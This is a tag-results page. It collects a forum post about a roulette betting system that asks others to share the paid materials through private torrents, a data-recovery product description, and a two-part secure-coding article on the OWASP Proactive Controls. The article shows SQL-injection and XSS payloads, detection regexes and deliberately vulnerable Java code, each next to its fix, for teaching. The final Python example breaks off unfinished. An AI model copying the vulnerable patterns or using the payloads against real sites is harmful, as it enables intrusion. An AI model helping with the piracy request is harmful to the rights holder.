Showing results for tags 'data'.

  1. Notice that everything is based on a certain "zone" of numbers that varies. Look at where he marks that segment with the two coins and you will see that it is not the same every time, yet he hits it every time: https://www.youtube.com/watch?v=c-_niuZOZhc And here he applies the method live (he sometimes misses too, but only 2 or 3 times out of all the attempts he made): And here is the site in question: Advanced semi automatic Visual Roulette System | Roulette System | how to beat roulette What do you think? Is it real or fake? I spent a while watching various roulette systems on YouTube and tested them here with play money: https://satoshibet.com/roulette and none of them (not even one) gave results. Does anyone have the materials from mastersroulette and is willing to share them? I mean from private torrents, because I don't think anyone paid 167 pounds for a system that may well be 100% nonsense. Thanks in advance!
  2. Product Description

The newly upgraded Power Data Recovery 6.8 adds support for dozens of RAW file types, including *.m4v, *.3g2, *.wtv, *.wrf, *.pps and *.dps, and for hard drives with 4096-byte sectors. Unlike other data recovery software, MiniTool Power Data Recovery is an all-in-one data recovery tool for home and business users. It can recover deleted data from the Windows Recycle Bin, restore lost data even if the partition has been formatted or deleted, and restore data lost to a corrupted hard drive, virus infection, unexpected system shutdown or software failure. It supports IDE, SATA, SCSI and USB hard disks, memory cards, USB flash drives, CD/DVD, Blu-ray discs and iPods.

MiniTool Power Data Recovery contains five data recovery modules: Undelete Recovery, Damaged Partition Recovery, Lost Partition Recovery, Digital Media Recovery and CD & DVD Recovery. Each module focuses on a different data loss scenario.

The Undelete Recovery module recovers deleted files and folders, including files emptied from the Windows Recycle Bin and files deleted with SHIFT+DELETE. It supports the FAT12, FAT16, FAT32, VFAT and NTFS file systems on hard disks, flash drives, memory sticks, memory cards and flash cards. To recover deleted files from CD/DVD discs, use the CD/DVD Recovery module.

The Damaged Partition Recovery module is the most powerful module of MiniTool Power Data Recovery. It recovers data from damaged or formatted partitions. For example, if a drive is displayed as RAW and Windows asks "Do you want to format this drive?", this module can solve the problem quickly. In other words, as long as the partition still exists, this module can recover data from it regardless of what caused the data loss. It supports not only MBR-style partitions but also Windows dynamic disk volumes: simple, spanned, striped and RAID-5 volumes. If you cannot find the partition you want to recover in this module, use the Lost Partition Recovery module.

The Lost Partition Recovery module recovers data after a partition has been lost or deleted. A user may accidentally delete an important partition with partition management software (for example, Partition Wizard), or lose it while reinstalling Windows on the drive. In other words, if you cannot find your partition in the Damaged Partition Recovery module, this is the module to use.

The Digital Media Recovery module recovers data from digital media devices such as flash drives, flash cards, memory cards, memory sticks and iPods. It focuses on lost or deleted photos, music (mp3 and mp4 files) and video files, and also recovers digital camera RAW files in the manufacturer-specific formats: Canon CRW and CR2, Kodak DCR, Minolta MRW, Nikon NEF, Olympus ORF, Pentax PEF, Fuji RAF and Sony SRF.

The CD/DVD Recovery module recovers lost and deleted files from damaged, scratched or defective CD and DVD discs. It can recover files written by common CD/DVD writing software, from all CD and DVD disc types (CD-ROM, CD-R, CD-RW, DVD-ROM, DVD-R and DVD-RW) and from quick-formatted RW discs, and it supports discs written with UDF packet-writing software such as DirectCD, InCD and packetCD.
  3. In the first part of this series, we covered the first five OWASP ProActive Controls and saw how they help in securing applications. In this part we look at the remaining five.

Protect Data and Privacy

This control is about protecting data inside the database or whichever data store is chosen. Sensitive data such as passwords, credit card numbers and bank account details must not be stored in the clear. Encryption and hashing are not interchangeable, and each fits a different kind of data.

Encryption converts readable plaintext into unreadable ciphertext. It is a two-way transformation: whoever holds the decryption key can recover the plaintext. There are two main kinds:

Symmetric encryption (secret key cryptography) uses the same secret key for encryption and decryption, so the receiver needs the key the sender used.

Asymmetric encryption (public key cryptography) uses a key pair. The public key encrypts and the private key decrypts.

Which one to use depends on the application's requirements.

Hashing is a one-way process: there is no key, and data converted into a hash cannot be turned back into the plaintext. It can still be guessed, though. An attacker who obtains a hash can try candidate inputs until one produces the same digest, which is why password hashes need a per-user salt and a deliberately slow algorithm such as bcrypt, scrypt, PBKDF2 or Argon2 rather than a plain MD5 or SHA-2 digest.

The choice between hashing and encryption is therefore dictated by what the data is for. If the sensitive data has to be shown back to the user in plaintext at some later point, encryption is the option (plaintext <-> ciphertext). If the data is only ever compared for validation, authentication or verification, as a password is, then only a hash should be stored (plaintext -> hash) and the comparison is made against the hash.

Sensitive information in transit between client and server must also be encrypted. Hyper Text Transfer Protocol Secure (HTTPS) should be used instead of Hyper Text Transfer Protocol (HTTP) whenever sensitive information is transmitted; it is what protects highly confidential traffic such as online banking. The encryption is provided by TLS. SSLv2, SSLv3 and TLS 1.0 are deprecated and known to be broken or weak and must be disabled on the server; TLS 1.2 or later should be used. The default port for HTTP is 80 and for HTTPS 443.

Implement Logging and Intrusion Detection

An application receives most of its requests through the GET, POST, PUT and DELETE methods. A request can be clean or malicious; a malicious request is one carrying an attack vector such as SQL injection, XSS or an attempt at unauthorized data access. Whether the users are the public or intranet employees, the application should keep track of the activity taking place.

Logging is important in every application and is one of the most neglected areas during development and deployment. It means recording data about every request sent and received: time, source IP address, requested page, GET parameters and POST parameters, and, for authenticated users, who the user is and when they logged in and out. Because all user activity is logged, sensitive user data such as passwords and financial details must NEVER be written to the log; those fields should be redacted before the entry is stored.

Intrusion detection means the application can tell whether a request it received contains an attack vector. When such a request is detected, suitable action such as logging it and dropping it should follow. For example, if SQL injection is attempted against a login page, the application should detect it, log the time and the originating IP address, and then act on it. ModSecurity together with the OWASP ModSecurity Core Rule Set is of great use when you want to detect and/or prevent malicious requests.

Logging keeps a record of every activity that takes place on the application; intrusion detection is implemented alongside it so that an attack or malicious data is noticed when it arrives and can be handled properly.

Leverage Security Features of Frameworks and Security Libraries

When developers start building an application they often either skip secure coding practices or pull in third-party libraries for security features. Most languages and frameworks have built-in security functions that should be used in preference to unknown third-party code. Recall OWASP Top 10 A9, "Using Components with Known Vulnerabilities": if a third-party component is used and a vulnerability is later discovered in it, the application becomes vulnerable with it.

Developers should use well-tested escaping functions, such as StringEscapeUtils.escapeHtml() from Apache Commons Lang in Java (escapeHtml4() in Commons Lang 3) and htmlentities() in PHP, to mitigate Cross-Site Scripting (XSS). Note that the escaping function must match the output context: HTML body encoding is not sufficient for data placed inside an attribute, a JavaScript block or a URL.

Well-tested security features are not always available in the language itself. Where the required features or libraries are missing, an industry-trusted and tested security library should be used. One well-known OWASP project for this purpose is OWASP ESAPI, which helps developers implement security controls in their applications.

For example, in Java, escapeHtml() can be used to mitigate XSS:

String name = StringEscapeUtils.escapeHtml(request.getParameter("name"));

and PreparedStatement is used to mitigate SQL injection:

PreparedStatement ps = con.prepareStatement("select * from users where username=? and password=? limit 0,1");

Using built-in or well-tested features means you do not have to depend on libraries you are not confident in or have not security-tested.

Include Security-Specific Requirements

When development of a software or web application starts, the software requirements are laid out at an early stage of the SDLC. Security requirements should be laid out at the same time. Making them part of the SDLC helps implement security inside the application and identifies the key areas that could be exploited. According to the OWASP Proactive Controls, three kinds of security requirement matter: security features and functions, business logic abuse cases, and data classification and privacy requirements.

Security features and functions

All security-relevant details, such as application features, modules, database details, how the modules work and how security is implemented in each, should be written down. The requirements should state that secure coding practices are to be applied at development time.

Business logic abuse cases

Every application defines a way to access data and perform operations. For example, an online banking transfer follows a well-defined process:

Log in to the bank account.
Choose the account to transfer from.
Choose the amount and the destination account.
Enter the profile password.
Enter the OTP received on the registered phone number.
Confirm the transaction.
Wait for the success message.

These steps define the data flow, i.e. the business logic. Once the business logic is written down, the weak points can be identified and the places where security must be strengthened become visible. For example: a user must not be able to choose someone else's account as the source of a transfer; a user must not be able to bypass the profile password step; an OTP must be valid once only, for that transaction and that account only.

Data classification and privacy requirements

Data classification should be decided at development time. Whenever the application interacts with the user, data is received and stored, so the following should be decided in advance: Which data is accepted from the user? Is it sensitive? Is it stored? If it is sensitive, will it be stored encrypted or hashed? If bank details are stored, they should be verified and validated by the application. Data authorization, i.e. who can read, modify and delete which data, should also be decided at this initial stage. Since the application will be dealing with users and operations on user data, it is critical to log all such activity, as discussed above under "Implement Logging and Intrusion Detection".

Security Design and Architecture

In the first nine ProActive Controls we saw how to implement security in code, which areas to secure, how to secure them and which components help. The last control covers the other areas of application security that should not be neglected. OWASP defines three key areas to take care of when developing any application: know your tools; tiering, trust and dependencies; and manage the attack surface.

Know Your Tools

Every application is built from a server-side language, a client-side language, possibly a database, and so on. Each component can open a security vulnerability in the application and the server. For example, an outdated version of the Struts framework can let a user achieve remote code execution, and an old PHP version can lead to the same result. The same goes for databases and every other component. So before development starts it should be clear which components can lead to a vulnerable application now or in the near future, and how they will be kept patched.

Tiering, Trust and Dependencies

Each layer of the application is a tier, and each tier carries its own risk and its own possible vulnerabilities. For every tier, client side, server side, database or anything else, the associated risk should be assessed and the necessary mitigations implemented. When the application handles user input and user data, trust decides which operation is performed, when, and on what. An authentication page that is not implemented properly provides a poor level of trust and lets malicious users reach other users' data; in the worst case a user transfers funds or reads confidential company data without proper authorization.

An application is assembled from several components that must work together, which is where dependencies come in: component X depends on component Y to function. It is common to keep older components for the sake of reliability, but every dependency should be checked thoroughly or it will leave an unwanted weakness in the application.

Manage the Attack Surface

The attack surface is the whole combined application: software, hardware, logic, client-side controls, server-side controls; everything physical, digital and logical. Any part of the setup found to be vulnerable is an open door for a malicious user. Developers are usually not concerned with the version of the web server software the application will be deployed on, but outdated server-side software, an unpatched Apache httpd or Struts for instance, can let an attacker work their way into the application and its user data.

Conclusion

From the OWASP ProActive Controls we learned how an application can be secured and how to identify the key areas of every application which together strengthen the application and its stored data. The controls are a good place to start training developers in secure coding and in hardening key areas such as authentication, authorization and user data access and storage. They should not be seen as the only set of controls for application security; they are a starting point for continuous learning and habitual secure coding practice.

Reference https://www.owasp.org/index.php/OWASP_Proactive_Controls
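The logging and intrusion detection control described in the post above, as an added example that is not part of the original article: a request logger that redacts sensitive fields before writing the entry and runs a small signature check on the raw values so that a payload hidden in the password field is still flagged. The request records, field names and attack patterns are constructed for this illustration; in production the detection side is what ModSecurity and the OWASP Core Rule Set do far more thoroughly.

```python
"""Request logging with sensitive-field redaction plus simple intrusion
detection.  Constructed example: the sample requests, SENSITIVE_FIELDS and
ATTACK_PATTERNS are assumptions, not taken from any real application."""
import json
import re

# Parameters that must NEVER reach the log in the clear (assumed names).
SENSITIVE_FIELDS = {"password", "passwd", "card_number", "cvv", "account_number"}

# Deliberately small signature set; enough to flag the textbook payloads.
ATTACK_PATTERNS = {
    "sqli": re.compile(r"(?i)('\s*or\s*'?\d+'?\s*=\s*'?\d+|\bunion\s+select\b|;\s*drop\s+table)"),
    "xss": re.compile(r"(?i)(<script\b|javascript:|\bon\w+\s*=)"),
    "path_traversal": re.compile(r"\.\./"),
}


def detect(params):
    """Return (field, label) pairs for every parameter matching a signature.
    Runs on the raw values, before redaction, so an attack placed in the
    password field is still noticed even though its value is never logged."""
    hits = []
    for field, value in params.items():
        for label, pattern in ATTACK_PATTERNS.items():
            if pattern.search(str(value)):
                hits.append((field, label))
    return hits


def redact(params):
    """Record that a sensitive field was sent, never what it held."""
    return {k: ("[REDACTED]" if k.lower() in SENSITIVE_FIELDS else v)
            for k, v in params.items()}


def log_entry(req):
    """Build one JSON log line for a request dict; also say if it looked malicious."""
    hits = detect(req["params"])
    entry = {
        "ts": req["ts"],
        "ip": req["ip"],
        "method": req["method"],
        "path": req["path"],
        "user": req.get("user"),          # None for unauthenticated requests
        "params": redact(req["params"]),
        "alerts": [f"{label} in {field}" for field, label in hits],
    }
    return json.dumps(entry, sort_keys=True), bool(hits)


def process(requests):
    """Log every request; return the log lines and the (ip, path) pairs to drop."""
    lines, dropped = [], []
    for req in requests:
        line, malicious = log_entry(req)
        lines.append(line)
        if malicious:
            dropped.append((req["ip"], req["path"]))
    return lines, dropped


# Constructed sample traffic: a clean login, an SQLi attempt, a stored-XSS attempt.
SAMPLE_REQUESTS = [
    {"ts": "2015-06-01T10:00:00Z", "ip": "10.0.0.5", "method": "POST", "path": "/login",
     "params": {"username": "alice", "password": "correct horse battery staple"}},
    {"ts": "2015-06-01T10:00:07Z", "ip": "198.51.100.23", "method": "POST", "path": "/login",
     "params": {"username": "admin", "password": "' or '1'='1"}},
    {"ts": "2015-06-01T10:01:12Z", "ip": "203.0.113.9", "method": "POST", "path": "/profile",
     "user": "mallory",
     "params": {"name": "<script>alert(document.cookie)</script>", "city": "Bucharest"}},
]

if __name__ == "__main__":
    log_lines, to_drop = process(SAMPLE_REQUESTS)
    print("\n".join(log_lines))
    print("dropped:", to_drop)
```

The order matters: detection runs before redaction, and redaction runs before serialisation, so the alert names the offending field while the log line never contains the password or card value itself. Signature matching like this is only a first filter; a real deployment should rely on a maintained rule set rather than a handful of regular expressions.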
  4. What is OWASP ProActive Controls? In one line, this project can be explained as “Secure Coding Practices by Developers for Developers“. OWASP ProActive Controls is a document prepared for developers who are developing or are new to developing software/application with secure software development. This OWASP project lists 10 controls that can help a developer implement secure coding and better security inside the application while it is being developed. Following these secure application development controls ensures that the key areas of the development cycle have secure coding along with traditional coding practices. The strength of this project is not just in the listed 10 controls but in the key references associated with it. Every control extends the knowledge and capabilities by mentioning existing OWASP or other open source projects that can be used to strengthen the security of an application. The ten controls defined by this project are: Parameterize Queries Encode Data Validate All Inputs Implement Appropriate Access Controls Establish Identity and Access Controls Protect Data and Privacy Implement Logging, Error Handling and Intrusion Detection Leverage Security Features of Frameworks and Security Libraries Include Security-Specific Requirements Design and Architect Security In Let us go deeper into each ProActive Control and see what it takes for us to implement it in the real world. PARAMETERIZE QUERIES One of the most dangerous attacks on a Web application and its backend data storage is SQL injection. It occurs when a user sends malicious data to an interpreter as an SQL query, which then manipulates the backend SQL statement. It is easy for an attacker to find a SQLi vulnerability using automated tools like SQLMap or by manual testing. The simplest and most popular attack vector used is: 1? or ‘1’= ‘1 Submitting it as a username and password or in any other field can lead to an authentication bypass in many cases. 
Here is an example of typical SQL injection in a user authentication module: String username= request.getParameter(“username”); String password= request.getParameter(“password”); Class.forName("com.mysql.jdbc.Driver"); Connection con = (Connection) DriverManager.getConnection("jdbc:mysql://database-server:3306/securitydb:", "root" ,"root"); Statement st= con.createStatement(); ResultSet rs=st.executeQuery("select * from users where username='"+username+"' and password='"+password+"' limit 0,1"); In this vulnerable code, the ‘Statement’ class is used to create a SQL statement, and at the same time it is modified by directly adding user input to it, then it is executed to fetch results from the database. Performing a simple SQLi attack in the username field will manipulate the SQL query, and an authentication bypass can take place. To stop a SQLi vulnerability, developers must prevent untrusted input from being interpreted as a part of a SQL query. It will lead to an attacker not being able to manipulate the SQL logic implemented on the server side. OWASP ProActive Controls recommends that developers should use parameterized queries only in combination with input validation when dealing with database operations. Here is an example of SQL query parameterization: String username=request.getParameter(“username”); String password=request.getParameter(“password”); Class.forName(“com.mysql.jdbc.Driver”); Connection con=( Connection) DriverManager.getConnection("jdbc:mysql://database-server:3306/securitydb:", "root" ,"root"); PreparedStatement ps=(PreparedStatement) con.prepareStatement("select * from users where username=? and password=? limit 0,1"); ps.setString(1,username); ps.setString(2,password); ResultSet rs=ps.executeQuery(); if(rs.next()) out.println("Login success"); else out.println("Login failed"); Using a parameterized query makes sure that the SQL logic is defined first and locked. 
Then the user input is added to it where it is needed, but treated as a particular data type string, integer, etc. as whole. In a database operation with a parameterized query in the backend, an attacker has no way to manipulate the SQL logic, leading to no SQL injection and database compromise. SQL injection vulnerability has been found and exploited in applications of very popular vendors like Yahoo! too. ENCODE DATA Data encoding helps to protect a user from different types of attacks like injection and XSS. Cross Site Scripting (XSS) is the most popular and common vulnerability in Web applications of smallest to biggest vendors with a Web presence or in their products. Web applications take user input and use it for further processing and storing in the database when ever needed. Also user input could be part of the HTTP response sent back to the user. Developers should always treat user input data as untrusted data. If user input at any point of time will be part of the response to user, then it should be encoded. If proper output encoding has been implemented, then even if malicious input was sent, it will not be executed and will be shown as plain text on the client side. It will help to solve a major web application vulnerability like XSS. Here is an example of XSS vulnerability: if(request.getMethod().equalsIgnoreCase("post")) { String name = request.getParameter("name"); if(!name.isEmpty()) { out.println("<br>Hi "+name+". How are you?"); } } In the above code, user input is not filtered and used, as it is part of message to be displayed to the user without implementing any sort of output encoding. Most common XSS vulnerabilities that affect users and are found in applications are of two types: Stored XSS Reflected XSS Stored XSS are those XSS which get stored on a sever like in a SQL database. Some part of the application fetches that information from the database and sends it to the user without properly encoding it. 
It then leads to malicious code being executed by the browser on the client side. Stored XSS can be carried out in public forums to conduct mass user exploitation. In Reflected XSS, the XSS script does not get stored on the server but can be executed by the browser. These attacks are delivered to victims via common communication mediums like e-mail or some other public website. By converting input data into its encoded form, this problem can be solved, and client side code execution can be prevented. Here is an example of output encoding of user input: if(request.getMethod().equalsIgnoreCase("post")) { String name = StringEscapeUtils.escapeHtml(request.getParameter("name")); if(!name.isEmpty()) { out.println("<br>Hi "+name+". How are you?"); } } In the next section you will see how input validation can secure an application. Combining input validation with data encoding can solve many problems of malicious input and safeguard the application and its users from attackers. OWASP has a project named OWASP ESAPI, which allows users to handle data in a secure manner using industry tested libraries and security functions. VALIDATE ALL INPUTS One of the most important ways to build a secure web application is to restrict what type of input a user is allowed to submit. This can be done by implementing input validation. Input validation means validating what type of input is acceptable and what is not. Input validation is important because it restricts the user to submit data in a particular format only, no other format is acceptable. This is beneficial to an application, because a valid input cannot contain malicious data and can be further processed easily. Important and common fields in a web application which require input validation are: First Name, Last Name, Phone Number, Email Address, City, Country and Gender. These fields have a particular format which has to be followed, especially email and phone number, which is very common. 
It is a known fact that first name and last name cannot have numbers in them; you cannot have a name as John39 *Bri@n. Such user input is treated as malicious and thus requires input validation. Input validation can be implemented on client side using JavaScript and on the server side using any server side language like Java, PHP etc. Implementing server side input validation is compulsory, whereas client side is optional but good to have. Now input validation is again of two types: Blacklist Whitelist The simplest example to explain the two can be: A security guard stops all guys wearing a red t-shirt who are trying to enter a mall, but anyone else can enter. This is a blacklist, because we are saying the red color is blocked. Whereas a whitelist says that guys wearing white, black and yellow t-shirt are allowed, and the rest all are denied entry. Similarly in programming, we define for a field what type of input and format it can have. Everything else is invalid. It is called whitelisting. Blacklisting is invalidating an input by looking for specific things only. For example, specifying that a phone number should be of 10 digits with only numbers is whitelist. Searching input for A-Z and then saying it is valid or not is blacklisting, because we are invalidating using alphabet characters only. Blacklisting has been proven to be weaker than whitelisting. In the above case, if a user enters 123456+890, then a blacklist will say it is valid because it does not contain A-Z. But it is wrong. Whereas a whitelist will say it contains a character that is not a number, and only numbers are allowed, so it is invalid. Input validation can be implemented in a web application using regular expressions. A regular expression is an object that describes a pattern of characters. These are used to perform pattern based matching on input data. 
Here is the example of a regular expression for first name: ^[a-zA-Z ]{3,30}$ This regular expression ensures that first name should include characters A-Z and a-z. The size of first name should be limited to 3-30 characters only. Let’s take another example of regular expression for username: ^[a-z0-9_]{3,16}$ Here this expression shows that username should include alphabets ‘a-z’, numbers ‘0-9? and special characters underscore ‘_’ only. The input length should be limited to 3-16 only. Email address validation can be performed using the following regular expression: ^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$ Depending upon the programming language a developer uses to build an application, regular expression can easily be implemented in it. Another advantage of regular expressions is that there are many industry tested regular expressions for all popular input types. So you don’t have to write one from scratch and then get it security tested. It is better to use industry tested regular expressions than writing one on your own (which in most cases will be flawed). OWASP has an Input Validation Cheat Sheet to help you implement proper input validation in your application. IMPLEMENT APPROPRIATE ACCESS CONTROLS Before we begin, it should be crystal clear that authentication is not same as authorization. Authentication takes care of your identity, whereas authorization makes sure that you have the authority or privilege to access a resource like data or some sensitive information. A simple real world example to show this can be: Alice visits Bob’s home. Her identity is known to Bob, so he allows her to enter her home (if she was not known to Bob then entry would have been denied, aka authentication failure). Alice is now inside Bob’s home. But she cannot open Bob’s family safe at home, because she is not authorized to do so. 
On the other hand, Bob’s sister Eve is known, so successful authentication occurs, and she is a family member, so she is authorized to access the family safe, aka successful authorization. Implementing authorization is one of the key components of application development. It has to be ensured at all times that access certain parts of the application should be accessible to users with certain privileges only. Authorization is the process of giving someone permission to do or have something. It is to be noted again that authentication is not equivalent to authorization. Many developers have a tough time handling authorization, and at some point leave a gap that gets exploited, leading to unauthorized data access. To solve this problem, access control or authorization checks should always be centralized. All user requests to access some page or database or any information should pass through the central access control check only. Access control checks should not be implemented at different locations in different application codes. If at any point in time you have to modify an access control check, then you will have to change it at multiple locations, which is not feasible for large applications. Access control should by default deny all requests which are from a user for a resource for which either access is restricted or an authorized entry has not been made. Layered Authorization Checks should be implemented. It means that the user’s request should be checked for authorization in layered manner instead of a haphazard manner. Below is an example: User requests “/protected” file access. Is user logged-in? Is user normal user or privileged user? Is user allowed access to the resource? Is resource marked as locked? f the access control check at any point in 1-5 fails, then the user will be denied access to the requested resource. OWASP Access Control Cheat Sheet can prove to be good resource for implementing access control in an application. 
ESTABLISH IDENTITY AND AUTHENTICATION CONTROLS

Authentication is the process of verifying that someone is who they claim to be; in other words, it is the process of identifying individuals. It is typically performed by entering a username and password or some other secret. Authentication and identity go hand in hand whenever information is accessed. For example, if you want to view your bank account details or perform a transaction, you need to log in to your bank's website; successfully authenticating proves that you are the owner of that account. The username and password are thus the elements of authentication that prove your identity.

OWASP Proactive Control "Establish Identity and Authentication Controls" says that all modules of an application related to authentication and identity management should have proper security in place and must protect all sensitive information. An application should also request and store only the information that is absolutely needed, and nothing else. Sensitive information such as passwords and account numbers should be stored in hashed or encrypted form in the database, so that a malicious user who gains unauthorized access to the database cannot simply read and misuse it. Below is an example of an application that stores the user's password in plaintext in a MySQL database.

String username = request.getParameter("username");
String password = request.getParameter("password");
PreparedStatement ps = (PreparedStatement) con.prepareStatement("insert into login_users values(?,?)");
ps.setString(1, username);
ps.setString(2, password);

Here the password is stored in plain text. If the database is compromised, the attacker can log in to any user's account with the username and password read straight from the table.

This weakness is mitigated by converting the sensitive information into a hashed format, such as a salted MD5 or SHA-2 hash, or into encrypted form, before storing it. (MD5 is used below because the article does; current guidance, including the OWASP cheat sheets listed at the end, favors a deliberately slow password hash such as PBKDF2, bcrypt or scrypt.) Here is an example of hashing the password before storing it in a SQL database:

import java.security.MessageDigest;
import java.security.SecureRandom;
import java.math.BigInteger;

String username = request.getParameter("username");
String password = request.getParameter("password");

// A fresh random salt for every registration
byte[] saltBytes = new byte[16];
new SecureRandom().nextBytes(saltBytes);
String salt = String.format("%032x", new BigInteger(1, saltBytes));

// Hash salt + password; the hash is padded to the full 32 hex digits
MessageDigest m = MessageDigest.getInstance("MD5");
m.update(salt.getBytes("UTF-8"));
m.update(password.getBytes("UTF-8"));
String calc_hash = new BigInteger(1, m.digest()).toString(16);
while (calc_hash.length() < 32) {
    calc_hash = "0" + calc_hash;
}

// Columns: username, salt, password_hash. The plaintext password is never stored.
PreparedStatement ps = (PreparedStatement) con.prepareStatement("insert into login_users values(?,?,?)");
ps.setString(1, username);
ps.setString(2, salt);
ps.setString(3, calc_hash);

The code above stores the password as a salted MD5 hash, with a different salt for every registration. If the database is compromised, the attacker first has to recover the clear text from the hashes; until then the data is of no use.

Broken session management is another class of vulnerability in web applications that do not implement sessions properly. For example, a user logs out and is redirected to some page, but the session is not properly invalidated, so a post-login page can still be opened without re-authentication. Another example is the session cookie being the same before and after login. Vulnerable code:

String username = request.getParameter("username");
String password = request.getParameter("password");
PreparedStatement ps = (PreparedStatement) con.prepareStatement("select * from users where username=? and password=? limit 0,1");
ps.setString(1, username);
ps.setString(2, password);
ResultSet rs = ps.executeQuery();
if (rs.next()) {
    session.setAttribute("useracc", rs.getString("username"));
    out.println("Login success");
} else {
    out.println("Login failed");
}

Observe that in the code above the session cookie JSESSIONID stays the same before and after login. An attacker who has physical access to the machine can note the pre-authentication session cookie value and reuse it once the victim has logged in. This attack is known as session fixation.

The patched code invalidates the session on successful authentication and creates a new session, and therefore a new cookie value, so the pre-login value is useless afterwards and session fixation cannot be exploited. Note that the old session object must not be used after invalidate(); the new one returned by request.getSession(true) is used instead:

String username = request.getParameter("username");
String password = request.getParameter("password");
PreparedStatement ps = (PreparedStatement) con.prepareStatement("select * from users where username=? and password=? limit 0,1");
ps.setString(1, username);
ps.setString(2, password);
ResultSet rs = ps.executeQuery();
if (rs.next()) {
    session.invalidate();                              // drop the pre-login session
    HttpSession newSession = request.getSession(true); // new session id, new JSESSIONID cookie
    newSession.setAttribute("useracc", rs.getString("username"));
    out.println("Login success");
} else {
    out.println("Login failed");
}

The session identifier should never be predictable and should be long and random enough to resist guessing. Authentication and secure storage are not limited to the username-password module of an application: other key modules such as the forgot-password and change-password flows are also part of authentication. Financial data and personal information such as an SSN are among the details a person cares most about, so an application storing that data should make sure it is encrypted securely.
OWASP has some key resources on this topic:

Authentication Cheat Sheet
Session Management Cheat Sheet

In this part of the OWASP Proactive Controls series we discussed in depth how Proactive Controls 1-5 can be applied in an application as secure coding practices that safeguard it from well-known attacks. The controls discussed do not change the application development lifecycle; they ensure that application security is given the same priority as other tasks and can be carried out easily by developers. We will see the last 5 Proactive Controls in the next and final part.

Reference: https://www.owasp.org/index.php/OWASP_Proactive_Controls

Source
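The three allow-list patterns from the input validation section above, applied in Python as an added example (this is not code from the original article). It also shows one caveat a practitioner needs: in Python, `$` matches before a trailing newline, so an anchored `^...$` used with `re.search` accepts "alice\n"; `fullmatch` on the unanchored pattern does not. The field names and `validate` helper are this example's own.

```python
import re

# Allow-list patterns from the text, compiled once. They are applied with
# fullmatch(), so the whole input must match; no ^/$ anchors are needed.
PATTERNS = {
    "first_name": re.compile(r"[a-zA-Z ]{3,30}"),
    "username": re.compile(r"[a-z0-9_]{3,16}"),
    "email": re.compile(
        r"[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*"
    ),
}


def validate(field, value):
    """Return True only if value is a str that fully matches the field's allow-list.

    Unknown fields raise rather than silently passing, so a new form field
    cannot bypass validation by never being registered here.
    """
    pattern = PATTERNS.get(field)
    if pattern is None:
        raise KeyError(f"no allow-list for field {field!r}")
    if not isinstance(value, str):
        return False
    return pattern.fullmatch(value) is not None


def anchored_search_vs_fullmatch(value):
    """Demonstrate the trailing-newline pitfall.

    Returns (accepted_by_anchored_search, accepted_by_fullmatch) for the
    username rule. With '^...$' and re.search, "alice\\n" is accepted because
    '$' matches just before a final newline; fullmatch rejects it.
    """
    loose = re.compile(r"^[a-z0-9_]{3,16}$")
    return (
        loose.search(value) is not None,
        PATTERNS["username"].fullmatch(value) is not None,
    )


def validate_form(form):
    """Validate a whole request dict; returns the list of fields that failed."""
    return [name for name, value in form.items() if not validate(name, value)]
```

Use `validate_form` at the single entry point where request parameters are read, and reject the request if the returned list is non-empty.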
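The centralized, deny-by-default, layered access control described above, as an added example (not the article's code). Every handler calls one `authorize` function, which walks the layers in the order the text lists them and stops at the first failure; a resource with no registry entry is denied. The resource registry, roles and the `/protected`, `/reports` and `/archive` paths are constructed for the example.

```python
from dataclasses import dataclass


@dataclass
class User:
    name: str
    logged_in: bool
    role: str  # "normal" or "privileged"


@dataclass
class Resource:
    path: str
    allowed_roles: frozenset
    locked: bool = False


# Single registry: every access decision is made against this table, nowhere else.
RESOURCES = {
    "/protected": Resource("/protected", frozenset({"privileged"})),
    "/reports": Resource("/reports", frozenset({"normal", "privileged"})),
    "/archive": Resource("/archive", frozenset({"privileged"}), locked=True),
}

KNOWN_ROLES = frozenset({"normal", "privileged"})


def authorize(user, path):
    """Layered check, deny by default. Returns (allowed, reason).

    Layers, in order: resource must be registered; user must be logged in;
    the role must be one we know; the role must be allowed for the resource;
    the resource must not be locked. The first failing layer wins.
    """
    resource = RESOURCES.get(path)
    if resource is None:
        return False, "unknown resource"  # no authorization entry -> deny
    if user is None or not user.logged_in:
        return False, "not authenticated"
    if user.role not in KNOWN_ROLES:
        return False, "unknown role"
    if user.role not in resource.allowed_roles:
        return False, "role not permitted"
    if resource.locked:
        return False, "resource locked"
    return True, "ok"


def handle_request(user, path):
    """The only way handlers read a resource: the check is not repeated elsewhere."""
    allowed, reason = authorize(user, path)
    if not allowed:
        return 403, reason
    return 200, f"contents of {path}"
```

Because the registry is the one place that knows what a role may reach, changing a rule means editing one entry rather than hunting through handlers.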
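The two authentication controls from the last section, salted password storage and session rotation on login, as one added example that is not the article's code. It uses PBKDF2-HMAC-SHA256 with a per-user random salt instead of the article's salted MD5, compares digests in constant time, and replaces the pre-login session id with a fresh one when credentials verify, which is what `session.invalidate()` followed by `request.getSession(true)` does in the Java snippet. The in-memory user and session stores and the iteration count are this example's own choices.

```python
import hashlib
import hmac
import os
import secrets

PBKDF2_ITERATIONS = 200_000  # assumption: tune to ~100 ms on the target hardware
_DUMMY_SALT = b"\x00" * 16   # used so unknown usernames cost the same as real ones


def hash_password(password, salt=None):
    """Return (salt, digest). A fresh 16-byte salt per registration."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return salt, digest


def verify_password(password, salt, digest):
    """Recompute with the stored salt and compare without early exit."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return hmac.compare_digest(candidate, digest)


class AuthService:
    def __init__(self):
        self.users = {}     # username -> (salt, digest); the plaintext is never kept
        self.sessions = {}  # session_id -> {"user": name or None}

    def register(self, username, password):
        self.users[username] = hash_password(password)

    def new_session(self):
        """Unpredictable 256-bit session id, issued to anonymous visitors too."""
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {"user": None}
        return sid

    def login(self, sid, username, password):
        """Verify credentials, then rotate the session id.

        The pre-login session is discarded and a new id issued, so an id an
        attacker observed or planted before login is worthless afterwards.
        Returns the new session id, or None on failure.
        """
        record = self.users.get(username)
        if record is None:
            hash_password(password, _DUMMY_SALT)  # keep timing similar for unknown users
            return None
        salt, digest = record
        if not verify_password(password, salt, digest):
            return None
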